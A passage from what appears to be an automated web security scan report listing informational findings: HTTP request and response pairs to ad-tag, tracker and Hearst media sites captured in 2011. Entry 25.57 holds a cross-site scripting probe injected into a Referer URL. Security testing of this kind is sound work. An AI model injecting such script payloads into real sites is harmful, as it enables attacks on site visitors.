Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1010
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:33:29 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
25.49. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/misquincemag_us

Request

GET /ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1121
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:34:39 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
25.50. http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf

Request

GET /ad/iframe/303/hearst_us/728x90/quickandsimple_us_btf?t=1316294786641&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.quickandsimple.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1308
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:36:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
25.51. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686626

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686626?t=1316295065618&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1022
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:29:53 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
25.52. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61686642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61686642

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61686642?t=1316294694453&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 461
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
25.53. http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/300x250/ht_1064834_61721100

Request

GET /ad/iframe/610/hearst/300x250/ht_1064834_61721100?t=1316295060880&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1022
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:29:49 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
25.54. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/728x90/ht_1064834_61686626

Request

GET /ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316295397553&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2Fflashtalking%2Fftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A%2F%2Fmpc.mxptint.net%2F1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26cachebuster%3D272524.66208301485%2526ftguid%253D1343AC00FD7B0F%2526ftcfid%253D237666001%2526ftoob%253D%2526ftsg%253Dadg&refer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F610%2Fhearst%2F300x250%2Fht_1064834_61686626%3Ft%3D1316295375688%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F%26refer%3Dhttp%253A%252F%252Fwww.seattlepi.com%252F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1046
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:35:25 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
25.55. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/728x90/ht_1064834_61686642

Request

GET /ad/iframe/610/hearst/728x90/ht_1064834_61686642?t=1316294711579&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1418
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:24:00 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
25.56. http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61721100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/hearst/728x90/ht_1064834_61721100

Request

GET /ad/iframe/610/hearst/728x90/ht_1064834_61721100?t=1316295053861&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1011
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:29:42 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:728px;height:90px;margin:0;border:0">



...[SNIP]...
25.57. http://tags.bluekai.com/site/2187  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2187

Request

GET /site/2187?ret=html&phint=section%3Dhp&phint=__bk_t%3DTeen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&phint=__bk_k%3Dfashion%20online%2C%20girl%20stuff%2C%20fashion%20magazine%2C%20teen%20fashion%20magazine%2C%20young%20movie%20star%2C%20celebrity%20gossip%20girl%2C%20teen%20girl%20gossip%2C%20teen%20blogs&limit=4&r=99761572 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:53 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: 24b6
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>
25.58. http://tracker.u-link.me/ut_.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.u-link.me
Path:   /ut_.js

Request

GET /ut_.js HTTP/1.1
Host: tracker.u-link.me
Proxy-Connection: keep-alive
Referer: http://www.uproxx.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:20:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 547
Content-Type: text/html

if(window.uw_partner_id){
   try {
       var uw_script = "http://widget.uproxx.com/pageTracker_v2";
       var uw_host = window.location.hostname;
       var uw_hostpath = window.location;
       var uw_referrer = documen
...[SNIP]...
25.59. http://video.od.visiblemeasures.com/log  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /log

Request

GET /log?m=USM2WGACdkskUn8rRk1BZnFwHHR0EgoCXVdRNkpBFwt3UyxdEXRxXlA1MUkkR1VLMhFwBV9cRTErSQ0rV1NRJRAAdTRRRRRLU14nX1kPUw0FZ3B8cgcAC3MDencLDwRycwMBYEZEBXUGAwZ2AAEFDAoBcQASM0RVR38GewNxCQh2cnJzBH8BcXUIeAALAgEHAQtxdHt0BQp2dXdydgBzAwxxZF0kQ1EcdHI0JkAEBWZwdAtjAHIJdBNWUTBYEAd%2FRFknDQV1BgYHe3YOcA8BCXMSLSFYXFI3C1UEdwEGDnYMBgdyCQUECxcDAgESJUMNBHFzD3cOBA53BHJ1AR9aJjsMXCgXBXwxRhcFAg5WAVhWVHpWVnMEAwMnc199UgAJcQRycwIJFycjRVhjB3FIMUcPWDBNRRcKcxVxdhF0cUdCNWcLAFNVVShHKmYAfFIsLxQLABRTWTBUFwUCSVRBBHYAcXVwcAcGcwQAAQECcQxzAXFzdn1wBwQHfwcHAH5wAQEEBQkHBA4UViZRQDNFVQhzZwsABg%3D%3D&p=1 HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://img.widgets.video.s-msn.com/v/4508.01/fl/player/current/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 16:24:48 GMT
Content-Type: text/html
Content-Length: 11
Last-Modified: Thu, 24 Feb 2011 08:33:55 GMT
X-Cnection: close
Accept-Ranges: bytes

objectid=1
25.60. http://widget.newsinc.com/ndn_toppicks.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /ndn_toppicks.html

Request

GET /ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503; ANALYTICS_USER_TOKEN=802756E5-8724-4943-AEFB-8B9150565A781316021953542

Response

HTTP/1.1 200 OK
x-amz-id-2: 9WQUntuDJ/CYhnfpEesSCFXuEOhpUmP3IO5SR09tJVrtAsLuL4BFN2IJTtA4o2SD
x-amz-request-id: 1E00B6A843310813
Date: Sat, 17 Sep 2011 16:23:07 GMT
x-amz-meta-cb-modifiedtime: Thu, 14 Jul 2011 20:42:43 GMT
Last-Modified: Tue, 26 Jul 2011 20:55:09 GMT
ETag: "870f6a88e0592c6f40eb3558439e83ec"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3352
Server: AmazonS3

<html>
<head>
   <script type="text/javascript" src="http://assets.newsinc.com/jquery-1.6.1.min.js"></script>
   <script type="text/javascript" src="http://assets.newsinc.com/ndn.2.js"></script>
</hea
...[SNIP]...
25.61. http://www.delish.com/api_static/twitter.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.delish.com
Path:   /api_static/twitter.json

Request

GET /api_static/twitter.json HTTP/1.1
Host: www.delish.com
Proxy-Connection: keep-alive
Referer: http://www.delish.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: countrycode=us; neworold=8; sample=10; s_nr=1316282680825; countrycode=us; rsi_segs=; docloc=http://www.delish.com/; __unam=753a475-13278828e41-121285cc-6; __utma=120665501.1463594788.1316281819.1316287865.1316294755.4; __utmb=120665501.1.10.1316294755; __utmc=120665501; __utmz=120665501.1316294755.4.4.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; original_referrer=http://hearst.com/newspapers/metrix4media.php; s_cc=true; s_lastvisit=1316294755393; hm_dslv=Less%20than%201%20day; s_pv=Delish%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=69
Date: Sat, 17 Sep 2011 16:24:45 GMT
Content-Length: 2028
Connection: close

{"statuses_count":1754,"favourites_count":2,"protected":false,"profile_text_color":"333333","profile_image_url":"http:\/\/a0.twimg.com\/profile_images\/487239769\/delish_normal_normal.png","name":"Del
...[SNIP]...
25.62. http://www.donatemydress.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.donatemydress.org
Path:   /

Request

GET / HTTP/1.1
Host: www.donatemydress.org
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 29267
Content-Type: text/html
Content-Location: http://www.donatemydress.org/index.html
Last-Modified: Wed, 13 Jul 2011 17:13:59 GMT
Accept-Ranges: bytes
ETag: "f36b68418041cc1:300"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:32:30 GMT


<html>
<head>
<title>Free Prom Dresses - Prom and Bridesmaid Dress Donations - DonateMyDress.org</title>
<META NAME="Description" CONTENT="DonateMyDress.org is a national network bringing toget
...[SNIP]...
25.63. http://www.metrix4media.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metrix4media.com
Path:   /

Request

GET / HTTP/1.1
Host: www.metrix4media.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=88224775.975060819.1316294733.1316294733.1316294733.1; __utmb=88224775.1.10.1316294733; __utmc=88224775; __utmz=88224775.1316294733.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php

Response

HTTP/1.1 200 OK
Content-Length: 5615
Content-Type: text/html
Content-Location: http://www.metrix4media.com/index.html
Last-Modified: Wed, 19 Jan 2011 23:36:58 GMT
Accept-Ranges: bytes
ETag: "08951c331b8cb1:492f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:36:20 GMT

<html>
<head>
   <title>Metrix4Media, LLC - Home</title>
   <link type="text/css" href="style.css" rel="stylesheet">
   <script type="text/javascript">
       image1 = new Image();
       image1.src = "images/b
...[SNIP]...
25.64. http://www.metrix4media.com/solutions.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.metrix4media.com
Path:   /solutions.html

Request

GET /solutions.html HTTP/1.1
Host: www.metrix4media.com
Proxy-Connection: keep-alive
Referer: http://www.metrix4media.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=88224775.975060819.1316294733.1316294733.1316294733.1; __utmb=88224775.2.10.1316294733; __utmc=88224775; __utmz=88224775.1316294733.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php

Response

HTTP/1.1 200 OK
Content-Length: 7099
Content-Type: text/html
Last-Modified: Wed, 19 Jan 2011 21:14:17 GMT
Accept-Ranges: bytes
ETag: "809a90d41db8cb1:492f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 16:40:01 GMT

<html>
<head>
   <title>Metrix4Media, LLC - Solutions</title>
   <link type="text/css" href="style.css" rel="stylesheet">
   <script type="text/javascript">
       image1 = new Image();
       image1.src = "ima
...[SNIP]...
25.65. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.misquincemag.com
Path:   /misquincepp-quinceanera-2009-mis-quince-insert

Request

GET /misquincepp-quinceanera-2009-mis-quince-insert HTTP/1.1
Host: www.misquincemag.com
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/cm/misquincemag/flash/promoplayer/master_template.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: original_referrer=http://hearst.com/newspapers/metrix4media.php; docloc=http://www.misquincemag.com/; __unam=882c0e5-1327948409e-34aa707e-1; __utma=60717745.46403009.1316294817.1316294817.1316294817.1; __utmb=60717745.1.10.1316294817; __utmc=60717745; __utmz=60717745.1316294817.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/metrix4media.php; s_cc=true; s_nr=1316294817174; hm_neworold=New; neworold=8; s_lastvisit=1316294817184; hm_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_pv=Mis%20Quince%20Mag%3A%20Home%20Page; s_prop3=no%20value; s_fbsr=1; s_sq=%5B%5BB%5D%5D; rsi_segs=; s_ppv=52

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: max-age=600
Date: Sat, 17 Sep 2011 16:40:56 GMT
Content-Length: 6526
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<framework>
<promoplayers>
<playerpreferences>
   <templatedata>
   <backgroundimage>images/background.png</backgroundimage>
   <timerIntCount>0</timerIntCoun
...[SNIP]...
25.66. http://www.networkadvertising.org/managing/opt_out.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/opt_out.asp

Request

GET /managing/opt_out.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://networkadvertising.org/consumer/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=1.1392774634.1315133979.1315133979.1315416406.2; __utmz=1.1315416406.2.2.utmccn=(referral)|utmcsr=allthingsd.com|utmcct=/20110906/bring-in-the-suits-yahoo-hiring-strategic-advisers-to-plot-next-moves/#|utmcmd=referral

Response

